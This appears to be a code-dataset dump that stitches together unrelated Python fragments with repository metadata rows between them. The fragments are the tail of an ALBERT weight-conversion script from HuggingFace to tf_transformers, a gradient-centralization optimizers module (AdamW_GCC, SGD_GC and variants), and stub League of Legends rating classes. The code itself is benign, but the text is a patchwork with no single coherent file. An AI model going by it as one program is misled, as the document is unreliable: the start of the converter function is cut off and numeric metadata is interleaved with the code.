"embeddings.token_type_embeddings.weight",
"embeddings.position_embeddings.weight",
"embeddings.LayerNorm.weight",
"embeddings.LayerNorm.bias",
"encoder.embedding_hidden_mapping_in.weight",
"encoder.embedding_hidden_mapping_in.bias",
"encoder.albert_layer_groups.0.albert_layers.0.attention.query.weight",
"encoder.albert_layer_groups.0.albert_layers.0.attention.query.bias",
"encoder.albert_layer_groups.0.albert_layers.0.attention.key.weight",
"encoder.albert_layer_groups.0.albert_layers.0.attention.key.bias",
"encoder.albert_layer_groups.0.albert_layers.0.attention.value.weight",
"encoder.albert_layer_groups.0.albert_layers.0.attention.value.bias",
"encoder.albert_layer_groups.0.albert_layers.0.attention.dense.weight",
"encoder.albert_layer_groups.0.albert_layers.0.attention.dense.bias",
"encoder.albert_layer_groups.0.albert_layers.0.attention.LayerNorm.weight",
"encoder.albert_layer_groups.0.albert_layers.0.attention.LayerNorm.bias",
"encoder.albert_layer_groups.0.albert_layers.0.ffn.weight",
"encoder.albert_layer_groups.0.albert_layers.0.ffn.bias",
"encoder.albert_layer_groups.0.albert_layers.0.ffn_output.weight",
"encoder.albert_layer_groups.0.albert_layers.0.ffn_output.bias",
"encoder.albert_layer_groups.0.albert_layers.0.full_layer_layer_norm.weight",
"encoder.albert_layer_groups.0.albert_layers.0.full_layer_layer_norm.bias",
"pooler.weight",
"pooler.bias",
]
# To vars (Transformer variables)
to_model_vars = [
"tf_transformers/albert/word_embeddings/embeddings:0",
"tf_transformers/albert/type_embeddings/embeddings:0",
"tf_transformers/albert/positional_embeddings/embeddings:0",
"tf_transformers/albert/embeddings/layer_norm/gamma:0",
"tf_transformers/albert/embeddings/layer_norm/beta:0",
"tf_transformers/albert/embedding_projection/kernel:0",
"tf_transformers/albert/embedding_projection/bias:0",
"tf_transformers/albert/transformer/layer/self_attention/query/kernel:0",
"tf_transformers/albert/transformer/layer/self_attention/query/bias:0",
"tf_transformers/albert/transformer/layer/self_attention/key/kernel:0",
"tf_transformers/albert/transformer/layer/self_attention/key/bias:0",
"tf_transformers/albert/transformer/layer/self_attention/value/kernel:0",
"tf_transformers/albert/transformer/layer/self_attention/value/bias:0",
"tf_transformers/albert/transformer/layer/self_attention_output/kernel:0",
"tf_transformers/albert/transformer/layer/self_attention_output/bias:0",
"tf_transformers/albert/transformer/layer/self_attention_layer_norm/gamma:0",
"tf_transformers/albert/transformer/layer/self_attention_layer_norm/beta:0",
"tf_transformers/albert/transformer/layer/intermediate/kernel:0",
"tf_transformers/albert/transformer/layer/intermediate/bias:0",
"tf_transformers/albert/transformer/layer/output/kernel:0",
"tf_transformers/albert/transformer/layer/output/bias:0",
"tf_transformers/albert/transformer/layer/output_layer_norm/gamma:0",
"tf_transformers/albert/transformer/layer/output_layer_norm/beta:0",
"tf_transformers/albert/pooler_transform/kernel:0",
"tf_transformers/albert/pooler_transform/bias:0",
]
# Simple Assertion
assert len(from_model_vars) == len(to_model_vars)
mapping_dict = {}
for index in range(len(from_model_vars)):
for i in range(config["num_hidden_layers"]):
mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)
# BertModel
from transformers import AlbertModel
model_hf = AlbertModel.from_pretrained(model_name)
# HF model variable name to variable values, for fast retrieval
from_to_variable_dict = {name: var.detach().numpy() for name, var in model_hf.named_parameters()}
tf_transformers_model_index_dict = {}
for index, var in enumerate(model.variables):
tf_transformers_model_index_dict[var.name] = index
# In auto_regressive mode, positional embeddings variable name has
# cond extra name. So, in case someone converts in that mode,
# replace above mapping here, only for positional embeddings
if var.name == "tf_transformers/bert/cond/positional_embeddings/embeddings:0":
mapping_dict[
"embeddings.position_embeddings.weight"
] = "tf_transformers/bert/cond/positional_embeddings/embeddings:0"
# legacy_ai <-- HuggingFace
assigned_map = []
# assigned_map_values = []
for original_var, legacy_var in mapping_dict.items():
index = tf_transformers_model_index_dict[legacy_var]
if "embedding_projection/kernel:0" in legacy_var:
model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
continue
if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
# huggingface (2D) to tf_transformers (3D)
model.variables[index].assign(
np.reshape(
np.transpose(from_to_variable_dict.get(original_var)),
(
config["embedding_projection_size"],
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
# assigned_map_values.append\
# ((tf.reduce_sum(from_to_variable_dict.get(original_var)).numpy(), \
# tf.reduce_sum(model.variables[index]).numpy()))
continue
if "query/bias:0" in legacy_var or "key/bias:0" in legacy_var or "value/bias:0" in legacy_var:
# huggingface (2D) to tf_transformers (3D)
model.variables[index].assign(
np.reshape(
from_to_variable_dict.get(original_var),
(
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
# assigned_map_values.append((tf.reduce_sum(\
# from_to_variable_dict.get(original_var)).numpy(),\
# tf.reduce_sum(model.variables[index]).numpy()))
continue
if "self_attention_output/kernel:0" in legacy_var:
# huggingface (3D) to tf_transformers (2D)
model.variables[index].assign(
np.reshape(
np.transpose(from_to_variable_dict.get(original_var)),
(
config["embedding_projection_size"],
config["num_attention_heads"] * config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
continue
if "self_attention_output/bias:0" in legacy_var:
# huggingface (3D) to tf_transformers (2D)
model.variables[index].assign(
np.reshape(
from_to_variable_dict.get(original_var),
(-1),
)
)
assigned_map.append((original_var, legacy_var))
continue
if (
"intermediate/kernel:0" in legacy_var
or "output/kernel:0" in legacy_var
or 'pooler_transform/kernel:0' in legacy_var
):
# huggingface (torch transpose
model.variables[index].assign(np.transpose(from_to_variable_dict.get(original_var)))
assigned_map.append((original_var, legacy_var))
continue
model.variables[index].assign(from_to_variable_dict.get(original_var))
assigned_map.append((original_var, legacy_var))
if SKIP_ASSERT is False:
from transformers import AlbertTokenizer
tokenizer = AlbertTokenizer.from_pretrained(model_name)
text = "[CLS] i want to [MASK] the car because it is cheap. [SEP]"
inputs = tokenizer(text, return_tensors="pt")
outputs_pt = model_hf(**inputs)
outputs_pt = torch.argmax(outputs_pt.last_hidden_state, dim=2)[0].numpy()
# BertMLM
from transformers import AlbertForMaskedLM
model_hf = AlbertForMaskedLM.from_pretrained(model_name)
hf_vars = [
"predictions.bias",
"predictions.dense.weight",
"predictions.dense.bias",
"predictions.LayerNorm.weight",
"predictions.LayerNorm.bias",
]
tf_vars = [
"tf_transformers/albert/logits_bias/bias:0",
"tf_transformers/albert/mlm/transform/dense/kernel:0",
"tf_transformers/albert/mlm/transform/dense/bias:0",
"tf_transformers/albert/mlm/transform/LayerNorm/gamma:0",
"tf_transformers/albert/mlm/transform/LayerNorm/beta:0",
]
mapping_dict = dict(zip(tf_vars, hf_vars))
# HF model variable name to variable values, for fast retrieval
hf_variable_dict = {name: var.detach().numpy() for name, var in model_hf.named_parameters() if name in hf_vars}
for var in model.variables:
if var.name in tf_vars:
hf_var_name = mapping_dict[var.name]
if "dense/kernel:0" in var.name:
var.assign(np.transpose(hf_variable_dict[hf_var_name]))
continue
var.assign(hf_variable_dict[hf_var_name])
if SKIP_ASSERT is False:
inputs = tokenizer(text, return_tensors="pt")
outputs_pt_mlm = model_hf(**inputs)
text_pt = tokenizer.decode(torch.argmax(outputs_pt_mlm[0], dim=2)[0])
del model_hf
inputs = tokenizer(text, return_tensors="tf")
inputs_tf = {}
inputs_tf["input_ids"] = inputs["input_ids"]
inputs_tf["input_type_ids"] = inputs["token_type_ids"]
inputs_tf["input_mask"] = inputs["attention_mask"]
outputs_tf = model(inputs_tf)
text_tf = tokenizer.decode(tf.argmax(outputs_tf["token_logits"], axis=2)[0])
assert text_pt == text_tf
outputs_tf = tf.argmax(outputs_tf["token_embeddings"], axis=2)[0].numpy()
tf.debugging.assert_equal(outputs_pt, outputs_tf)
def convert_albert_tf(model, config, model_name):
"""TF converter
Args:
model_hf: HuggingFace Model (TF)
model: tf_transformers model/layer
config: dict
Returns:
a function
"""
# When dropout, use_auto_regressive is enabled assertion won't work
SKIP_ASSERT = False
try:
# LegacyLayer
local_config = model._config_dict
except Exception as e:
# LegacyModel
local_config = model.model_config
if local_config['use_dropout']:
logging.warn("Note: As `use_dropout` is True we will skip Assertions, please verify the model.")
SKIP_ASSERT = True
if local_config['use_auto_regressive']:
raise ValueError(
"Please save model checkpoint without `use_auto_regressive` and then reload it with `use_auto_regressive`."
)
SKIP_ASSERT = True
import transformers
transformers.logging.set_verbosity_error()
# From vars (Transformer variables)
from_model_vars = [
"tf_albert_model/albert/embeddings/word_embeddings/weight:0",
"tf_albert_model/albert/embeddings/token_type_embeddings/embeddings:0",
"tf_albert_model/albert/embeddings/position_embeddings/embeddings:0",
"tf_albert_model/albert/embeddings/LayerNorm/gamma:0",
"tf_albert_model/albert/embeddings/LayerNorm/beta:0",
"tf_albert_model/albert/encoder/embedding_hidden_mapping_in/kernel:0",
"tf_albert_model/albert/encoder/embedding_hidden_mapping_in/bias:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/query/kernel:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/query/bias:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/key/kernel:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/key/bias:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/value/kernel:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/value/bias:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/dense/kernel:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/dense/bias:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/LayerNorm/gamma:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/attention/LayerNorm/beta:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/ffn/kernel:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/ffn/bias:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/ffn_output/kernel:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/ffn_output/bias:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/full_layer_layer_norm/gamma:0",
"tf_albert_model/albert/encoder/albert_layer_groups_._0/albert_layers_._0/full_layer_layer_norm/beta:0",
"tf_albert_model/albert/pooler/kernel:0",
"tf_albert_model/albert/pooler/bias:0",
]
# To vars (Transformer variables)
to_model_vars = [
"tf_transformers/albert/word_embeddings/embeddings:0",
"tf_transformers/albert/type_embeddings/embeddings:0",
"tf_transformers/albert/positional_embeddings/embeddings:0",
"tf_transformers/albert/embeddings/layer_norm/gamma:0",
"tf_transformers/albert/embeddings/layer_norm/beta:0",
"tf_transformers/albert/embedding_projection/kernel:0",
"tf_transformers/albert/embedding_projection/bias:0",
"tf_transformers/albert/transformer/layer/self_attention/query/kernel:0",
"tf_transformers/albert/transformer/layer/self_attention/query/bias:0",
"tf_transformers/albert/transformer/layer/self_attention/key/kernel:0",
"tf_transformers/albert/transformer/layer/self_attention/key/bias:0",
"tf_transformers/albert/transformer/layer/self_attention/value/kernel:0",
"tf_transformers/albert/transformer/layer/self_attention/value/bias:0",
"tf_transformers/albert/transformer/layer/self_attention_output/kernel:0",
"tf_transformers/albert/transformer/layer/self_attention_output/bias:0",
"tf_transformers/albert/transformer/layer/self_attention_layer_norm/gamma:0",
"tf_transformers/albert/transformer/layer/self_attention_layer_norm/beta:0",
"tf_transformers/albert/transformer/layer/intermediate/kernel:0",
"tf_transformers/albert/transformer/layer/intermediate/bias:0",
"tf_transformers/albert/transformer/layer/output/kernel:0",
"tf_transformers/albert/transformer/layer/output/bias:0",
"tf_transformers/albert/transformer/layer/output_layer_norm/gamma:0",
"tf_transformers/albert/transformer/layer/output_layer_norm/beta:0",
"tf_transformers/albert/pooler_transform/kernel:0",
"tf_transformers/albert/pooler_transform/bias:0",
]
# Simple Assertion
assert len(from_model_vars) == len(to_model_vars)
mapping_dict = {}
for index in range(len(from_model_vars)):
for i in range(config["num_hidden_layers"]):
mapping_dict[from_model_vars[index].format(i)] = to_model_vars[index].format(i)
# BertModel
from transformers import TFAlbertModel
model_hf = TFAlbertModel.from_pretrained(model_name)
from_to_variable_dict = {var.name: var for var in model_hf.variables}
tf_transformers_model_index_dict = {}
for index, var in enumerate(model.variables):
tf_transformers_model_index_dict[var.name] = index
# In auto_regressive mode, positional embeddings variable name has
# cond extra name. So, in case someone converts in that mode,
# replace above mapping here, only for positional embeddings
if var.name == "tf_transformers/albert/cond/positional_embeddings/embeddings:0":
mapping_dict[
"embeddings.position_embeddings.weight"
] = "tf_transformers/albert/cond/positional_embeddings/embeddings:0"
# legacy_ai <-- HuggingFace
assigned_map = []
# assigned_map_values = []
for original_var, legacy_var in mapping_dict.items():
index = tf_transformers_model_index_dict[legacy_var]
if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
# huggingface (2D) to tf_transformers (3D)
model.variables[index].assign(
tf.reshape(
from_to_variable_dict.get(original_var),
(
config["embedding_projection_size"],
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
# assigned_map_values.append\
# ((tf.reduce_sum(from_to_variable_dict.get(original_var)).numpy(), \
# tf.reduce_sum(model.variables[index]).numpy()))
continue
if "query/bias:0" in legacy_var or "key/bias:0" in legacy_var or "value/bias:0" in legacy_var:
# huggingface (2D) to tf_transformers (3D)
model.variables[index].assign(
tf.reshape(
from_to_variable_dict.get(original_var),
(
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
# assigned_map_values.append((tf.reduce_sum(\
# from_to_variable_dict.get(original_var)).numpy(),\
# tf.reduce_sum(model.variables[index]).numpy()))
continue
model.variables[index].assign(from_to_variable_dict.get(original_var))
assigned_map.append((original_var, legacy_var))
if SKIP_ASSERT is False:
from transformers import AlbertTokenizer
tokenizer = AlbertTokenizer.from_pretrained(model_name)
text = "[CLS] i want to [MASK] the car because it is cheap. [SEP]"
inputs = tokenizer(text, return_tensors="tf")
outputs_hf = model_hf(**inputs)
outputs_hf = tf.argmax(outputs_hf.last_hidden_state, axis=2)[0].numpy()
# BertMLM
from transformers import TFAlbertForMaskedLM
model_hf = TFAlbertForMaskedLM.from_pretrained(model_name)
hf_vars = [
"tf_albert_for_masked_lm/predictions/bias:0",
"tf_albert_for_masked_lm/predictions/dense/kernel:0",
"tf_albert_for_masked_lm/predictions/dense/bias:0",
"tf_albert_for_masked_lm/predictions/LayerNorm/gamma:0",
"tf_albert_for_masked_lm/predictions/LayerNorm/beta:0",
]
tf_vars = [
"tf_transformers/albert/logits_bias/bias:0",
"tf_transformers/albert/mlm/transform/dense/kernel:0",
"tf_transformers/albert/mlm/transform/dense/bias:0",
"tf_transformers/albert/mlm/transform/LayerNorm/gamma:0",
"tf_transformers/albert/mlm/transform/LayerNorm/beta:0",
]
mapping_dict = dict(zip(tf_vars, hf_vars))
# HF model variable name to variable values, for fast retrieval
hf_variable_dict = {var.name: var for var in model_hf.variables}
for var in model.variables:
if var.name in tf_vars:
hf_var_name = mapping_dict[var.name]
var.assign(hf_variable_dict[hf_var_name])
if SKIP_ASSERT is False:
inputs = tokenizer(text, return_tensors="tf")
outputs_hf_mlm = model_hf(**inputs)
text_hf = tokenizer.decode(tf.argmax(outputs_hf_mlm[0], axis=2)[0])
del model_hf
inputs_tf = {}
inputs_tf["input_ids"] = inputs["input_ids"]
inputs_tf["input_type_ids"] = inputs["token_type_ids"]
inputs_tf["input_mask"] = inputs["attention_mask"]
outputs_tf = model(inputs_tf)
text_tf = tokenizer.decode(tf.argmax(outputs_tf["token_logits"], axis=2)[0])
assert text_hf == text_tf
outputs_tf = tf.argmax(outputs_tf["token_embeddings"], axis=2)[0].numpy()
if keras_utils.get_policy_name() == 'float32':
tf.debugging.assert_equal(outputs_hf, outputs_tf)
| 45.736347 | 120 | 0.674792 | 3,032 | 24,286 | 5.110158 | 0.09004 | 0.016458 | 0.080031 | 0.0759 | 0.86569 | 0.842197 | 0.817478 | 0.809604 | 0.780496 | 0.77643 | 0 | 0.011659 | 0.219509 | 24,286 | 530 | 121 | 45.822642 | 0.80575 | 0.116487 | 0 | 0.587013 | 0 | 0.025974 | 0.432149 | 0.365798 | 0 | 0 | 0 | 0 | 0.062338 | 1 | 0.015584 | false | 0 | 0.036364 | 0 | 0.057143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ba310ed56843611de170706a44fd596818e043ba | 15,227 | py | Python | iglovikov_helper_functions/dl/pytorch/optimizers.py | AIChuY/iglovikov_helper_functions | 46383c7a8b0f8dbdbf7907e119b6c2417877ad33 | [
"MIT"
] | 46 | 2019-09-21T02:05:50.000Z | 2022-01-02T10:27:56.000Z | iglovikov_helper_functions/dl/pytorch/optimizers.py | AIChuY/iglovikov_helper_functions | 46383c7a8b0f8dbdbf7907e119b6c2417877ad33 | [
"MIT"
] | 9 | 2020-04-05T01:19:56.000Z | 2021-08-02T16:53:18.000Z | iglovikov_helper_functions/dl/pytorch/optimizers.py | AIChuY/iglovikov_helper_functions | 46383c7a8b0f8dbdbf7907e119b6c2417877ad33 | [
"MIT"
] | 14 | 2019-09-21T02:54:17.000Z | 2022-02-28T11:58:34.000Z | """
From https://github.com/Yonghongwei/Gradient-Centralization
"""
import math
import torch
from torch.optim.optimizer import Optimizer, required # type: ignore
class AdamW_GCC(Optimizer):
r"""Implements Adam algorithm.
It has been proposed in `Adam: A Method for Stochastic Optimization`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsgrad (boolean, optional): whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
.. _Adam\: A Method for Stochastic Optimization:
https://arxiv.org/abs/1412.6980
.. _On the Convergence of Adam and Beyond:
https://openreview.net/forum?id=ryQu7f-RZ
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0, amsgrad=False):
if lr < 0:
raise ValueError(f"Invalid learning rate: {lr}")
if eps < 0:
raise ValueError(f"Invalid epsilon value: {eps}")
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = {"lr": lr, "betas": betas, "eps": eps, "weight_decay": weight_decay, "amsgrad": amsgrad}
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("amsgrad", False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group["params"]:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError("Adam does not support sparse gradients, please consider SparseAdam instead")
amsgrad = group["amsgrad"]
state = self.state[p]
# State initialization
if len(state) == 0:
state["step"] = 0
# Exponential moving average of gradient values
state["exp_avg"] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state["exp_avg_sq"] = torch.zeros_like(p.data)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state["max_exp_avg_sq"] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state["exp_avg"], state["exp_avg_sq"]
if amsgrad:
max_exp_avg_sq = state["max_exp_avg_sq"]
beta1, beta2 = group["betas"]
# GC operation for Conv layers
if len(list(grad.size())) > 3:
grad.add_(-grad.mean(dim=tuple(range(1, len(list(grad.size())))), keepdim=True))
state["step"] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group["eps"])
else:
denom = exp_avg_sq.sqrt().add_(group["eps"])
bias_correction1 = 1 - beta1 ** state["step"]
bias_correction2 = 1 - beta2 ** state["step"]
step_size = group["lr"] * math.sqrt(bias_correction2) / bias_correction1 # skipcq PTC-W0028
# p.data.addcdiv_(-step_size, exp_avg, denom)
p.data.add_(-step_size, torch.mul(p.data, group["weight_decay"]).addcdiv_(1, exp_avg, denom))
return loss
class SGD_GCC(Optimizer):
def __init__(self, params, lr=required, momentum=0, dampening=0, weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = {
"lr": lr,
"momentum": momentum,
"dampening": dampening,
"weight_decay": weight_decay,
"nesterov": nesterov,
}
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("nesterov", False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group["weight_decay"]
momentum = group["momentum"]
dampening = group["dampening"]
nesterov = group["nesterov"]
for p in group["params"]:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
# GC operation for Conv layers
if len(list(d_p.size())) > 3:
d_p.add_(-d_p.mean(dim=tuple(range(1, len(list(d_p.size())))), keepdim=True))
if momentum != 0:
param_state = self.state[p]
if "momentum_buffer" not in param_state:
buf = param_state["momentum_buffer"] = torch.clone(d_p).detach()
else:
buf = param_state["momentum_buffer"]
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
p.data.add_(-group["lr"], d_p)
return loss
class SGD_GC(Optimizer):
def __init__(self, params, lr=required, momentum=0, dampening=0, weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = {
"lr": lr,
"momentum": momentum,
"dampening": dampening,
"weight_decay": weight_decay,
"nesterov": nesterov,
}
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("nesterov", False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group["weight_decay"]
momentum = group["momentum"]
dampening = group["dampening"]
nesterov = group["nesterov"]
for p in group["params"]:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
# GC operation for Conv layers and FC layers
if len(list(d_p.size())) > 1:
d_p.add_(-d_p.mean(dim=tuple(range(1, len(list(d_p.size())))), keepdim=True))
if momentum != 0:
param_state = self.state[p]
if "momentum_buffer" not in param_state:
buf = param_state["momentum_buffer"] = torch.clone(d_p).detach()
else:
buf = param_state["momentum_buffer"]
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
p.data.add_(-group["lr"], d_p)
return loss
class SGDW(Optimizer):
def __init__(self, params, lr=required, momentum=0, dampening=0, weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = {
"lr": lr,
"momentum": momentum,
"dampening": dampening,
"weight_decay": weight_decay,
"nesterov": nesterov,
}
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("nesterov", False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group["weight_decay"]
momentum = group["momentum"]
dampening = group["dampening"]
nesterov = group["nesterov"]
for p in group["params"]:
if p.grad is None:
continue
d_p = p.grad.data
old = torch.clone(p.data).detach()
# if weight_decay != 0:
# d_p.add_(weight_decay, p.data)
if momentum != 0:
param_state = self.state[p]
if "momentum_buffer" not in param_state:
buf = param_state["momentum_buffer"] = torch.zeros_like(p.data)
buf.mul_(momentum).add_(d_p)
else:
buf = param_state["momentum_buffer"]
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
p.data.add_(-group["lr"], d_p)
if weight_decay != 0:
p.data.add_(-weight_decay * group["lr"], old)
return loss
class SGDW_GCC(Optimizer):
def __init__(self, params, lr=required, momentum=0, dampening=0, weight_decay=0, nesterov=False):
if lr is not required and lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = {
"lr": lr,
"momentum": momentum,
"dampening": dampening,
"weight_decay": weight_decay,
"nesterov": nesterov,
}
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super().__init__(params, defaults)
def __setstate__(self, state):
super().__setstate__(state)
for group in self.param_groups:
group.setdefault("nesterov", False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group["weight_decay"]
momentum = group["momentum"]
dampening = group["dampening"]
nesterov = group["nesterov"]
for p in group["params"]:
if p.grad is None:
continue
d_p = p.grad.data
old = torch.clone(p.data).detach()
# if weight_decay != 0:
# d_p.add_(weight_decay, p.data)
# GC operation for Conv layers
if len(list(d_p.size())) > 3:
d_p.add_(-d_p.mean(dim=tuple(range(1, len(list(d_p.size())))), keepdim=True))
if momentum != 0:
param_state = self.state[p]
if "momentum_buffer" not in param_state:
buf = param_state["momentum_buffer"] = torch.zeros_like(p.data)
buf.mul_(momentum).add_(d_p)
else:
buf = param_state["momentum_buffer"]
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
p.data.add_(-group["lr"], d_p)
if weight_decay != 0:
p.data.add_(-weight_decay * group["lr"], old)
return loss
| 38.258794 | 116 | 0.533789 | 1,742 | 15,227 | 4.491963 | 0.122847 | 0.070288 | 0.040895 | 0.030415 | 0.77099 | 0.74901 | 0.739808 | 0.720128 | 0.70901 | 0.692652 | 0 | 0.014389 | 0.365601 | 15,227 | 397 | 117 | 38.355164 | 0.795652 | 0.15814 | 0 | 0.817164 | 0 | 0 | 0.123144 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05597 | false | 0 | 0.011194 | 0 | 0.104478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ba83e5bbee2aaa924558284417a6ab9c17bef2f4 | 6,821 | py | Python | loldib/getratings/models/NA/na_nocturne/na_nocturne_bot.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_nocturne/na_nocturne_bot.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_nocturne/na_nocturne_bot.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Nocturne_Bot_Aatrox(Ratings):
pass
class NA_Nocturne_Bot_Ahri(Ratings):
pass
class NA_Nocturne_Bot_Akali(Ratings):
pass
class NA_Nocturne_Bot_Alistar(Ratings):
pass
class NA_Nocturne_Bot_Amumu(Ratings):
pass
class NA_Nocturne_Bot_Anivia(Ratings):
pass
class NA_Nocturne_Bot_Annie(Ratings):
pass
class NA_Nocturne_Bot_Ashe(Ratings):
pass
